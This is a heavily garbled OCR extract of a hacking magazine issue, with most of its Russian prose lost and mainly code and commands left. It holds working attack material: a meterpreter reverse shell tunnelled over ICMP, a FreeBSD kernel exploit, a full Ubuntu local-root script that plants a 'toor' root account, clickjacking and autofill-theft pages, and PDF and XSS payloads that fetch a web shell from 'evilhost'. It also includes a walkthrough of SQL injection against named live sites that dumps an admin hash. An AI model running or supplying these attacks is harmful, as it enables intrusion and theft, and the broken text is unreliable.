5. fgdump.

VersionInfo Resource Hacker

,
. :
1. RH c : Action - Save All Resources.
2. RH c fgdump: Action - Add a new Resource .
3. Resource Name 1, Resource Language 1049.
4. fgdump.

virustotal.com. 23 41
(fgdump_5.exe).
, ,
. ,
. ,
.

:
WINDOWS (ASLR/DEP)

:
Windows-
. , . , Windows
. , DEP XP SP2,
, SEH' Vista, . -, ,
MS. ,

044

VirusTotal.com fgdump
, , , virustotal
, .
, , ,
virustotal, fgdump. .

- MS. ,
, . , DEP ROP- (. ][), ,
ASLR. -
ASLR,
DEP. . ,
. . ,
( , , -
- :)) ,
Alin Rad Pop Secunia (secunia.com) ,
( ) DEP, ASLR, .
secunia.com/gfx/pdf/DEP_ASLR_2010_paper.pdf.

: , ICMP(PING)-

default.asp). , (
, ) TCP Data ICMP-. , . ,
, TCP , ICMP .

ICMP- ()
, - . , : ,
NAT ( IP, ).
, . ,
: HTTP/HTTPS,
. -,
. , , TCP/UDP- ,
, ICMP ( -
). - :). :
ICMP-
( , NAT). , ICMP
(. Internet Control Message Protocol, RFC 792, 950) ,
, .
,
(IP) (TCP/UDP) OSI. , ,
ping. , - ,
ICMP- 8, ICMP-
0.
: IP-,
4 . Type Code 8 , 16
, 32 .
Data -, .
64 .
. , ICMP
,
(, , TCP).
.
, ICMP, , , -. ptunnel, itun, ishell, x-proxy (xakep.ru/post/16337/

.
, , ptunnel (cs.uit.no/~daniels/PingTunnel). ,
Windows ( ).
. Ishell. ,
ICMP. .
, , icmpshell.sourceforge.net.
make .
(192.168.0.1) :
./ishd

:
./ish 192.168.0.1

. , ,
ICMP-. , , . :
Win, ,
NAT. ,
backconnect.
ptunnel (by Daniel Stoedle).
,
ICMP. (ICMP-)
- ,
ICMP.
TCP . - :).
-: meterpreter
Metasploit(MSF) ICMP-. ptunnel
, , Win WinPCAP
(winpcap.org/install/default.htm). , , IP 192.168.146.1, 192.168.146.128.
meterpreter 5678 exe-,

045

meterpreter ICMP-
( MSF , ):
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1,LPORT=5678 X > reverseMP2.exe

() ICMP-:
ptunnel

(5678 ) meterpreter:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5678 E

ICMP- :
ptunnel.exe -p 192.168.146.128 -lp 5678 -da 192.168.146.128 -dp 5678

:
-p , ICMP-;
-lp ,
TCP ( meterpreter);


-da -dp IP , ptunnel.


ptunnel ,
, MD5.
reverseMP2.exe
meterpreter ICMP. !
. ptunnel- 5678
, ptunnel,
MSF. meterpreter, ,
ptunnel- (127.0.0.1). , -, .
(
Win NAT ICMP), ... , ,
exe exe IExpress,
. , , ,
. ! meterpreter,
.
, ( ICMP)
,
, raw .
.
ICMP-, . ,
:). z


, Digital Security a.sintsov@dsec.ru


, , . : get root *nix
. LNK
. , , ,
2.

01

FREEBSD

TARGETS
FreeBSD 7.2
FreeBSD 7.3
FreeBSD 8.0 (DoS)

CVE
CVE-2010-2020

BRIEF
FreeBSD.
, . ,
,
. Census
Labs (Patroklos Argyroudis),
*nix-.
nfs_mount(), NFS.
API- mount() nmount(). ,
root.

EXPLOIT
,
exploit-db.com.
char *ptr;
long *lptr;
struct nfs_args na;
struct iovec iov[6];

memset(na.fh, 0x41, BUFSIZE);


na.fhsize = BUFSIZE;

,
.
.
ptr = (char *)na.fh;
lptr = (long *)(na.fh + BUFSIZE - 8);
*lptr++ = 0x12345678;     /* saved %ebp */
*lptr++ = (u_long)ptr;    /* saved %eip */

, ptr , 272 . lptr ,


, 264 . , 264 268
, EBP, 268 272
,
. EBP , EIP
ptr, .
, ,
.
.
memcpy(ptr, kernelcode, (sizeof(kernelcode) - 1));

kernelcode ,
UID 0, , root.
, , , ,
nmount(). ,
:
mkdir(DIRPATH, 0700);

na.version = 3;
na.fh = calloc(BUFSIZE, sizeof(char));


NTFS. , .
BUFSIZE = 272 .
""=0x61
:


DIRPATH /tmp/nfs, /tmp


. , nmount(), ,
iovec.
, na.
iov[0].iov_base = "fstype";
iov[0].iov_len = strlen(iov[0].iov_base) + 1;
iov[1].iov_base = FSNAME;
iov[1].iov_len = strlen(iov[1].iov_base) + 1;
iov[2].iov_base = "fspath";
iov[2].iov_len = strlen(iov[2].iov_base) + 1;
iov[3].iov_base = DIRPATH;
iov[3].iov_len = strlen(iov[3].iov_base) + 1;
iov[4].iov_base = "nfs_args";
iov[4].iov_len = strlen(iov[4].iov_base) + 1;
iov[5].iov_base = &na;
iov[5].iov_len = sizeof(na);

FreeBSD. 0x61616161. Halt

FreeBSD. . root

nmount() c :
nmount(iov, 6, 0);

, ,
, , ,
exit(). , root',
!

SOLUTION
. -, FreeBSD 8.1, , -,
, , -,
root'. ,
. ,
:
sysctl vfs.usermount

, UID=0.

02

UBUNTU

TARGETS
Ubuntu 9.10
Ubuntu 10.04 LTS

CVE
CVE-2010-0832

BRIEF
Linux Ubuntu ,
root'.
, .
, root'.

EXPLOIT
, , SSH, . pam_motd,
motd.legal-notice ./cache.
, , ... root', ,
UID .
*nix-, ?
.cache .cache, , , /etc/shadow.
user@ubuntu1004desktop:~$ rm -rf ~/.cache
user@ubuntu1004desktop:~$ ln -s /etc/shadow ~/.cache;

SSH Ubuntu .
, /etc/shadow:
user@ubuntu1004desktop:~$ ls -l /etc/shadow
-rw-r----- 1 user user 1162 2010-07-25 12:50 /etc/shadow

, /etc/shadow, - root.
, .
.
: toor
/etc/passwd /etc/shadow toor. UID
, root'.
, .
:
#!/bin/bash
# /etc/passwd
P='toor:x:0:0:root:/root:/bin/bash'
# ... /etc/shadow
# toor
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'

echo "[*] Ubuntu PAM MOTD local root"

#
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
#
backup() {
    [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
    [ -e "$1" ] || return 0
    mv "$1"{,.bak} || return 1
    echo "[*] Backuped $1"
}
#
restore() {
    [ -e "$1" ] && rm -rf "$1"
    [ -e "$1".bak ] || return 0
    mv "$1"{.bak,} || return 1
    echo "[*] Restored $1"
}
# SSH-
key_create() {
    backup ~/.ssh/authorized_keys
    ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
    [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
    #
    mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
    echo "[*] SSH key set up"
}
#
key_remove() {
    rm -f "$KEY"
    restore ~/.ssh/authorized_keys
    echo "[*] SSH key removed"
}
#
own() {
    [ -e ~/.cache ] && rm -rf ~/.cache
    #
    ln -s "$1" ~/.cache || return 1
    echo "[*] spawn ssh"
    # , SSH-
    ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
    [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
    echo "[+] owned: $1"
}
bye() {
    key_remove
    exit 1
}
# :
KEY="$(mktemp -u)"
# , SSH
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
# C .cache
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
# /etc/passwd
own /etc/passwd && echo "$P" >> /etc/passwd
# /etc/shadow
own /etc/shadow && echo "$S" >> /etc/shadow
# .cache
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
# SSH,
key_remove
echo "[+] Success! Use password toor to get root"
#
#
# toor
# =toor
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor

Ubuntu. 1

Ubuntu. 2. /etc/shadow

SOLUTION
, :
user@ubuntu1004desktop:~$ sudo aptitude -y update
user@ubuntu1004desktop:~$ sudo aptitude -y install libpam~n~i

LNK. PoC

Ubuntu. , root

03


.LNK-

TARGETS
Windows XP
Windows 2000/2003/2008
Windows Vista
Windows 7

CVE
CVE-2010-2568

BRIEF
0day ,
Win32/Stuxnet, (
). . , -
DLL- - DLL ...

EXPLOIT
,
.LNK ?
,
. (explorer.exe
shell32.dll) . , .LNK
(.cpl),
LoadLibraryW()
.CPL-. ,
.CPL-, , , .DLL. ,
, LoadLibraryW() DllMain(). , . , , . ,
.
, .LNK , ,
, autorun.inf. PoC
, ,
DbgView. : SUCKM3 FROM
EXPLORER.EXE MOTH4FUCKA #@!. - , ,

... , MetaSploit . pwn ,


,
.
WebDav,
HTTP. , WebDav- , , IE,

(explorer.exe).
. ,
.lnk, ... ,
, .DLL-,
.

SOLUTION
, ,
, . (Didier Stevens)
. -,
Ariad [],
/ CD-ROM USB-. -,
(SRP).
.

, .
, .
.
, .
.
, .exe,
.
, .

04


SAFARI

TARGETS
Safari 4
Safari 5

CVE
N/A

BRIEF
*nix Windows, .
(Jeremiah Grossman), ,

051

Clickjacking.

LNK. Metasploit

, . , ,
, - ,
, ,
- :).

EXPLOIT
?
, , , , editbox.
Safari
, ( ?).
!
, ID, . ! ,
? , -,
. :
, ,
, .
, , , , . -
, . :
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>Settings - Profile - brightkite.com</title>
</head>
<body>
  <form action="http://localhost/" method="get">
    <label for="fullname">Full name</label>
    <input id="fullname" name="fullname" />
    <input type="submit" />
    <input id="street" name="street" style="opacity:0"/>
    <input id="e-mail" name="e-mail" style="opacity:0"/>
  </form>
</body>
</html>


, .
, .
( GET).

SOLUTION
Apple , , ,
, .
.

05

CLICKJACKING

TARGETS
Firefox 3.6.7
Netscape 9.0.0.6
Opera 10.60
Safari 4.0.2
SeaMonkey 2.0.6

CVE
N/A

BRIEF
, Clickjacking.
, ,
, .
Securitylab.ir (Pouya
Daneshmand)
. Clickjacking?
, - .
, (
).

EXPLOIT
HTML-.
, ,
.
. ,
. .
FireFox,
. HTML:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>
<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';"
     style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
  clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
  clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=clickjack_mouseX-1;
  document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
<p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
<b><br><br>
<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
<p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>
</center></body></html>

Clickjacking.

Autofill.

mydiv.
, ,
,
. ,
clickjack_armor().
. clickjack_
armor() mydiv ,
onmouseover
. ,
, . .
, , , , , .

SOLUTION
. ,
, , , . z



Digital Security a.sintsov@dsec.ru

Windows
Stuxnet

. ,
.

, ,
. ,
.
. , CC, , , .

SCADA, Supervisory Control And Data
Acquisition,
(- ). , ,
, .. ,
, ,
, .
, Stuxnet.


STUXNET

- , VirusBlokAda. 17
, 10
- ( , , ,
). Microsoft
Realtek. VirusBlokAda
0day- (.lnk),
Microsoft ( ). Realtek? ,
, Verisign Realtek.


(HIPS, ), ,
. ,

Siemens
SCADA
Symantec
, , .
, - ,
, , ,
.

, , - USB-. autorun.inf .
,
.DLL-, , . ,
.DLL- (,
, , .TMP) .LNK-.
.LNK .
.
Total Commander .DLL-
! ? ,

. , .DLL- .
HEX-, ,
.DLL. ,
, ! -
. .CPL. CPL , , .DLL,
, ,
.DLL. , .DLL,
. ,
, . , ,
LoadLibraryW().
,
DllMain()
. ,
.CPL-,
( DllMain()),
. , .PIF-.


, ,

CC. . .LNK
~wtr4141.tmp,
. , ( 25 ).
Symantec,
, .
0day-, ,
, ~wtr4141.tmp,
kernel32.
dll. :
FindFirstFileW
FindNextFileW
FindFirstFileExW

ntdll.dll:
NtQueryDirectoryFile
ZwQueryDirectoryFile


~wtr .tmp (
.lnk),
, , . ,
.
. ~wtr4141.tmp
(~wtr4132.tmp). ,
, ntdll.dll
:

ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwCloseFile
ZwQueryAttributesFile
ZwQuerySection

LoadLibrary
,



mypremierfutbol.com
todaysfutbol.com

Symantec

,
~wtr4132.tmp, , , ( UPX). ,
,
( API ).
mrxcls.sys
mrxnet.sys ( - Stuxnet). ,
,
.
~wtr4141.tmp.
, , Realtek, (
).
~wtr4141.tmp USB-. ,
.SYS- (HKEY_LOCAL_MACHINE\SYSTEM\
ControlSet001\Services\MRxCls). .DLL, SCADA
Siemens Step 7.
, SCADA . ,
.DLL (
). ,
(MSSQL). , WinCCConnect 2WSXcder. SCADA Siemens
Simatic WinCC. ,
Siemens. , . ,

. ,
. :


- . Symantec .
,
XOR 31- ,
.DLL-. XOR-,
, .

( , , ,
SCADA).
RPC , , .

?! , . SCADA .
. ( ), ,
( , ).
, .DLL SCADA.
?
? ,
, ,
,
( )!
,
( ? :)).


. Symantec
.

SCADA. , ( ). ,
...

, ,
SCADA. , , ,
.
,
ERP-,

virustotal .LNK-
( Java-)
. ERP- , , .., ..
( , ERP
, SCADA ,
...). - (
aka sh2kerr). .LNK-,
, , Zeus
. , Rapid7 Metasploit, HTTP
WebDav.
.DLL-, . ,
,
, ,
. DLL ,
, , ,
. PoC
(suckme.lnk_, )
virustotal.com. 27 ,
.
,
Java. :
opy Java.lnk Java.lnk_

virustotal PoC

.
HEX-.
Unicode-, Java- .
CPL-, Java
Unicode-. CPL (DLL) ,
(fa ff ff ff 20) .
.LNK. virustotal.com.
Unicode- 11 , Java-
8, 70% ,
, Symantec, Kaspersky, AVG,
NOD32. . ...
, , ,
,
,
. , : AdBlokAda
( ), Symantec ( ), ESET
.
,
:).
, , . z



Cr@wler crawler@xakep.ru

! SQL-,
, .
, , , ,
, .
! ,
.
?
, ,
.
. ,
-. ,
. ,
, ,
, ,
:). .
, , ,


.
,
,
- , .
, ,
,
,
, ,
. ,
.


:)

my-symbian.com . Pangolin

(
, , , , , , e-mail - ),
.
. , ,
ICQ- ,

.
, ICQ- PHP-,
(,
PHP, ),
,
.
. , , .
, , , ,
,
, , ( ) .

-. ? - poker .php?=.
.
2) Domain Selection ,
. ,
(, , ),
.mil.
3) Max Url Threads , , ,
.
5 100, ,
. ,
, TCPIP.SYS
.
4) Max Url Threads ,
. Sqli
Error Based .
Scan Sites,
.
30-40 .
.
, ;
Test Sites.
, . , , ,
.

, .
, ,
( ),
.
.
REILUKE! Exploit Scanner. (
, ) SQL , XSS, LFI, RFI,
( -).
,
, ,
Scan
Sites:
1) Dork .
: .php?catid=, .php?uid=, .aspx?item=
. , .
:
, ,
, . ,
dork , , online RPG, ,
,

, ,
15-20 . ?
.
, ,
. ,
( , ,
), ,
Pangolin Professional
Edition SqliHelper (,
DVD).
, , . SqliHelper, http://www.cwdma.ca/lang/
en/profile.php?userID=86 (,
, ,



Reiluke! ExploitScanner

),
(
. ,
,
:)). , . userID
,
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 6

.
SqliHelper. , Target
REILUKE! Exploit Scanner ,
Inject. , ,
, : Mysql
version 5 OK - Please Get Database. Get Database,
Database Name
: information schema, CWDMA, EBCTest. ,
, ,
Get Tables.
. , Users, Company,
Address1, Address2, City, Province, Country, Phone
. , ,
,
Get Columns. ,
Dump Now. , , ,
-, -
:).
, ,
, ,
, IP- (,
, , VPN
; Forum Proxy Leecher,
TOR).

, ,
: REILUKE! Exploit Scanner,


10-15 ,
Pangolin
SqliHelper. ,
,.
, ,
. ,
, . , , ,
.
,
, .
,
NetDevilz Scanner ( - ,
). http://my-symbian.com/
uiq/software/category.php?fldAuto=6. , Pangolin, URL
,
Play. Data,
Tables. ,
, , b2users. ,
Columns. ! ,
IP-, ICQ . , , .
, ,
.
- :
,
Datas. ,
, ,
: !
, . ? shop.my-symbian.com.


. REILUKE! Login Finder
. ,
-. - !
,
, ROBOTS.TXT, ,
,

242shop.ch . :)
. .
: site:my-symbian.com
intext:login.
.

... !

,
. ,
. , , ,
. , ,
, , :). , ,
. ,
-,
.
, ? Exploit
Scanner, nike adidas vans php?id=
, . - facebook.com,
. , 242shop.ch/shoes_details.php?id=162,
.
SQLiHelper.
242shopch, 242shopch1, 242shopch2.
wp_users, , ,
, , :
admin:$P$B5LgS3enL1rifx5pe****a8QA61AZi1:admin:***@24
2shop.ch

, . , - ,

Login Finder

,
. , :).

, -
,
.
.
. ! z



artembaranovex@gmail.com


Windows 7

, !
. ,
PEB.
, ,
, .
.
.

, Windows
. ,
( #PF).
( VMM)
( ,
, )
, , .
VMM
(Virtual Address Descriptor),
.


VAD
. windbg. VAD , , ,
(, PEB).
VAD
dll,
Digital Investigation The VAD tree: A process-eye view of physical
memory (dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf).
VAD, , ,
.

!process
Vad
, , VAD
DLL.

VAD,

, VAD ,
. , VirtualAlloc MEM_RESERVE
VAD, .
MEM_COMMIT
. :
DLL , ,
, VAD,
. , ,
VAD .
MiCheckVirtualAddress,
, PTE.
VAD.
:
MiCheckVirtualAddress (
IN PVOID VirtualAddress,
OUT PVOID Unknown,
OUT PMMVAD *VadOut
)

VAD

VAD : _MMVAD_SHORT, _MMVAD _MMVAD_


LONG. . (. _MMADDRESS_
NODE):
typedef struct _MMVAD_SHORT
{
union
{
LONG32 Balance : 2;
struct _MMVAD* Parent; // VAD
} u1;
struct _MMVAD* LeftChild; // VAD
struct _MMVAD* RightChild; // VAD
ULONG32 StartingVpn; //
ULONG32 EndingVpn; // ,
union
{
ULONG32 LongFlags;
struct _MMVAD_FLAGS VadFlags; //
} u;

} MMVAD_SHORT, *PMMVAD_SHORT;


typedef struct _MMVAD_FLAGS
{
ULONG32 CommitCharge : 19; // 0 BitPosition
ULONG32 NoChange : 1; // 19 BitPosition
ULONG32 VadType : 3; // 20 BitPosition
ULONG32 MemCommit : 1; // 23 BitPosition
ULONG32 Protection : 5; // 24 BitPosition
ULONG32 Spare : 2; // 29 BitPosition
ULONG32 PrivateMemory : 1; // 31 BitPosition
}MMVAD_FLAGS, *PMMVAD_FLAGS;

CommitCharge (COMMIT) .
VadType Vad.
Protection .
MMVAD_SHORT , , ,
, VitualAlloc. _MMVAD ,
.
typedef struct _MMVAD
{
union
{
LONG32 Balance : 2;
struct _MMVAD* Parent;
} u1;
struct _MMVAD* LeftChild;
struct _MMVAD* RightChild;
ULONG32 StartingVpn;
ULONG32 EndingVpn;
union
{
ULONG32 LongFlags;
struct _MMVAD_FLAGS VadFlags;
}u;

// , VAD
union
{
struct _SUBSECTION* Subsection;
struct _MSUBSECTION* MappedSubsection;
};
struct _MMPTE* FirstPrototypePte;
struct _MMPTE* LastContiguousPte;
struct _LIST_ENTRY ViewLinks;
struct _EPROCESS* VadsProcess;
} MMVAD, *PMMVAD;

.
typedef struct _SUBSECTION
{
//
PCONTROL_AREA ControlArea;
// , VMM
union
{
ULONG LongFlags;
MMSUBSECTION_FLAGS SubsectionFlags;
} u;

} SUBSECTION, *PSUBSECTION;


!vad

NT                 VADROOT
2195 (2K)          0x194
2600 (XP)          0x11C
3790 (2K3)         0x250
6000 (VISTA)       0x238
7100 (SEVEN RC)    0x274
7600 (SEVEN RTM)   0x278

FILE_OBJECT,
.
typedef struct _CONTROL_AREA
{
PSEGMENT Segment;

struct _EX_FAST_REF FilePointer;

}CONTROL_AREA, *PCONTROL_AREA;

FileObject
FilePointer 0xFFFFFFF8.
EPROCESS VadRoot, ,
.
_VAD, Parent, ,
.
VAD .
VadRoot = *(PULONG )( (PUCHAR )Eprocess + EPROCESS_VadRoot_Offs ) & 0xFFFFFFFC;
VadRoot EPROCESS NT. Windows 7
MM_AVL_TABLE (, ).
typedef struct _MM_AVL_TABLE {
struct _MMADDRESS_NODE BalancedRoot;
struct {
ULONG32 DepthOfTree : 5;
ULONG32 Unused : 3;
ULONG32 NumberGenericTableElements : 24;
};
VOID* NodeHint;
VOID* NodeFreeHint;


}MM_AVL_TABLE, *PMM_AVL_TABLE;

, BalancedRoot.
u1.Parent ,
RightChild,
, .
VAD MMVAD_SHORT
MMVAD MMVAD_LONG. ,
.
4 ( -4
). VadS
_MMVAD_SHORT, Vad _MMVAD, Vadl _MMVAD_LONG.
, , ControlArea, Subsection, FilePointer.

.
(!process 0 0) :
kd> !process 84944418 0
PROCESS 84944418 SessionId: 1 Cid: 0a40 Peb: 7ffdf000 ParentCid: 08e4
DirBase: 3ec0c420 ObjectTable: 993f0830 HandleCount: 256.
Image: TOTALCMD.EXE

:
kd> dt _MM_AVL_TABLE 84944418+278 -r2
nt!_MM_AVL_TABLE
+0x000 BalancedRoot: _MMADDRESS_NODE
+0x000 u1 : <unnamed-tag>
+0x000 Balance : 0y00
+0x000 Parent: 0x84944690
(. )
+0x004 LeftChild : (null)
+0x008 RightChild : 0x84947610
VadRoot

kd> dd 84944418+278 l1
84944690 84944690

VAD:
kd> dc 0x84947610-4 l1
8494760c 20646156 Vad

[Figure: VAD notepad.exe]

MMVAD.
kd> dt _MMVAD 0x84947610
nt!_MMVAD
+0x000 u1 : <unnamed-tag>
+0x004 LeftChild : 0x84949290 _MMVAD
+0x008 RightChild : 0x84941b48 _MMVAD
+0x00c StartingVpn : 0x703b0
+0x010 EndingVpn : 0x703e1
...
+0x024 Subsection : 0x84820110 _SUBSECTION
+0x024 MappedSubsection : 0x84820110 _MSUBSECTION
+0x028 FirstPrototypePte : 0x98f1ece0 _MMPTE
+0x02c LastContiguousPte : 0xfffffffc _MMPTE
+0x030 ViewLinks : _LIST_ENTRY [ 0x848e3618 0x84820108 ]
+0x038 VadsProcess : 0x84944419 _EPROCESS

VAD 0x703b0000-0x703e1000 ,
0x84820110 ( ,
EXE- ).
kd> dt _subsection ControlArea 0x84820110
nt!_SUBSECTION
+0x000 ControlArea : 0x848200c0 _CONTROL_AREA
kd> dt _control_area 0x848200c0 -r1
nt!_CONTROL_AREA
+0x000 Segment : 0x98f1ecb0 _SEGMENT
...
+0x024 FilePointer : _EX_FAST_REF
+0x000 Object : 0x88cbc79a
+0x000 RefCnt : 0y010
+0x000 Value : 0x88cbc79a

, : 0x88cbc79a & 0xFFFFFFF8 = 0x88CBC798.
kd> dt _file_object filename 88CBC798
nt!_FILE_OBJECT
+0x030 FileName : _UNICODE_STRING "\Windows\System32\winmm.dll"

, VAD winmm.dll !
, Windows 2000/XP VadRoot,
PVOID VadRoot.
VAD .
.

.
. , ,
, .
, . z



d0znp ONsec

0DAY- CMS

XSS- 1-,
- CC09. , ,
? , ,
WAF,
, WAF. , ,
...

,
.
, ,
, ,
. , ,
- .
,
. ,
,
.
,
CMS.
filesize
hijacking Internet Explorer. ,
(seclists.org/fulldisclosure/2010/Apr/288). , .
, filesize - Internet Explorer 9.
SVG IMG, , , filesize SVG, XML, -


XML- -,
. , ,
, filesize XML 0.
, -,
.
1-, . ,
, , ,
.
Web Application Firewall
Evaluation Criteria Web Application Security
Consortium, , .
.
8.0.5 CC09, WAF,
.
9.0.3, , , -.
, .

, .

XSS [URL]
BB-,
,
. , BB HTML-, ,
, , , . ,
HTML-. ,
XSS.
XSS :
[URL=a' attribute='blabla']XSS[/URL]


.
, ,
WAF, onload, style, onmouseover
.

,
,
. ,
,
WAF. , .
,
,
.
, ,
sessid,
WAF.
SQL PHP-, WAF,
. ! PHP-
, , , CSRF,
-! ,
WAF, XSS+CSRF+WAF by pass
-. :).

PDF

,
WAF.
.

. . , ,

HTML injection ICQ


PDF-.
, .
, ...

Adobe Acrobat
. - , ( , ) ,
PDF JavaScript.
, cookies, , JavaScript.
:
PDF GET- POST- ,
CSRF , , -, . WAF
PDF- .

.

WARNING
warning

,

.

PDF CSRF EXPLOIT

PDF CSRF
.
- -. , PDF-
.
. -, PDF JavaScript
, HTTP- . -, Adobe Acrobat
,
.
,
, . , JavaScript PDF- FormCalc. Google
: help.adobe.com/en_US/livecycle/es/FormCalc.pdf. , , , , URL functions. Get, Post, Put.
PDF-,
:
1. GET-
targethost:6448/bitrix/admin/user_admin.php?lang=ru.
2. , sessid.
3. POST- sessid wget http://
evilhost.ru/s.txt -O shell.php targethost: 6448/
bitrix/admin/php_command_line.php?mode=frame&lang=ru.
FormCalc
:

INFO

info

,
PDF,

Adobe Acrobat. ,




CSRF.
PDF

!


HTTP
PDF.
, PDF
XSS, SecurityLab.Ru
var a = Get("http://targethost:6448/bitrix/admin/
user_admin.php?lang=ru")
var sessid = (Substr(a,At(a,"sessid=")+7,32))
Post("http://targethost:6448/bitrix/admin/php_command_
line.php?mode=frame&lang=ru",Concat("sessid=",sessi
d,"&query=system%28%27wget http://evilhost:6448/s.
txt O shell.php%27%29%3B"),"application/x-www-formurlencoded")

PDF- Adobe Livecycle Designer (adobe.com/go/trylivecycle),


3 . PDF
- .
PDF
iText (itextpdf.com) Java.
:
public static void replacePDFScript(
String filename, String script)
{
try
{
PdfReader reader = new PdfReader(filename);
XfaForm xfa = new XfaForm(reader);
Document doc = xfa.getDomDocument();
NodeList list = doc.getElementsByTagName("script");
list.item(0).setTextContent(script);
PdfStamper stamper = new PdfStamper(reader,
new FileOutputStream(filename+"_mod.pdf"));
xfa.setDomDocument(doc);
xfa.setChanged(true);
XfaForm.setXfa(xfa, stamper.getReader(),
stamper.getWriter());
stamper.close();
}
catch (Exception e) {
e.printStackTrace();
}
}

, , 3 . , Adobe Acrobat . PDF, , ActiveX-


Adobe Acrobat ,
Acrobat. , PDF-,
.
, . , , ,


. , , , ,
. ,
, ,
!
. , PoC- .
,
, PDF.
,
. ,
, . http://targethost:6448/bitrix/admin/shell.php.
CSRF,
. , , , CSRF.
HTTP-,
.

, WAF!

CSRF PDF XSS.


,
(.
XSS).
, . , 09,
. , , XSS
HTML. 15
InternetExplorer onmouseenter
onmouseleave. WAF onmouseover,
onmouseout. , :). , ...
onselectstart, IE,
Chrome. Chrome
, IE , .
CSRF
, -, -. , , ,
advisory ,
.


. advisory . CSRF via
PDF, XSS [URL] WAF.
(XSS+WAF

HTTP://WWW
links

bypass). , WAF ,
, ,
JavaScript, . , ,
jjencode.
- , URL,
, . ,
jjencode .
.
:
1. iframe, form, input (
POST sessid query).
2. iframe -
innerHTML.
3. innerHTML iframe sessid.
4. sessid value
input.
5. form.submit.
, , onload. ,
i[onload]=a, ,
-, . .
, setTimeout(a,10000).
, iframe
10 , a sessid.
. :
[URL=http://a' onmouseenter='var i=document.
createElement("iframe");i.style.
width="0px";i.style.height="0px";var p=/
sessid=.{32}/;var t="";var f=document.
createElement("form");f.method="POST";f.
action="/bitrix/admin/php_command_
line.php?mode=frame";var s=document.
createElement("INPUT");s.style.
visibility="hidden";s.type="text";s.
name="sessid";var y=document.
createElement("INPUT");y.style.
visibility="hidden";y.type="text";y.
name="query";y.value="system(\"wget
htt\".\"p://evilhost:6448/s.txt
-O s.php\");";f.appendChild(s);f.
appendChild(y);function b(){t+=i.
document.body.innerHTML.match(p);s.
value=t.substr(7);f.submit()};i.
src="/bitrix/admin/";document.body.
appendChild(i);document.body.appendChild(f);
setTimeout(b,10000);'] ![/URL]

-,
CSRF

PoC
Internet Explorer (,
, ).
,
.
,
.


FormCalc help.adobe.com/en_US/livecycle/es/FormCalc.pdf
Adobe Livecycle Designer, trial PDF adobe.com/go/trylivecycle

CSRF owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
(
,
) oxod.ru

,
-. ,
, .

, ,
, .
. ,
ICQ .
< >, .
ICQ ! !
.
. [URL]
jjencode , . , XSS
-.
. WAF
, ,
. ,
, ,
.

DVD
dvd

, ,
.
. .

.
. ,
, , , ,
.
. ( ), . ,
oxod.ru. z



Digital Security a.sintsov@dsec.ru

JIT SPRAY !

JIT SPRAY!

JIT SPRAY.
Flash- ActionScript, Safari
JIT- JavaScript. , 6
DEP ASLR Windows 7
.
...

, ? ,
Hack In The
Box JIT SPRAY ( 8
6 ) EGG-HUNTER
( )
JIT , Flash 10.1 , JIT SPRAY .
- ,
, , ...

. Windows 7 ,


DEP (
) ASLR ( ) HEAP SPRAY .
, ,
, .
, JIT SPRAY Flash-
, , Adobe JIT . JIT?

JUST-IN-TIME

Just-In-Time ,
, , ,
, , . JIT , JIT- ( :). ,

ASLR .
JIT SPRAY .

ActionScript ( Flash-)
. JavaScript Safari Windows.
JavaScript, XOR:
<SCRIPT>
function jit_() {
var y=( 0x11111111^
0x22222222^
0x33333333^
0x44444444^
0x55555555^
0x66666666^
0x77777777^
0x88888888);
return y;
}
</SCRIPT>

JIT SPRAY

jit_().
, , ( HEX). , XOR
,
, RWX ( Flash RX).

, 20 . Flash-
. , DEP ASLR?
, .

Safari 4.0.5.
,

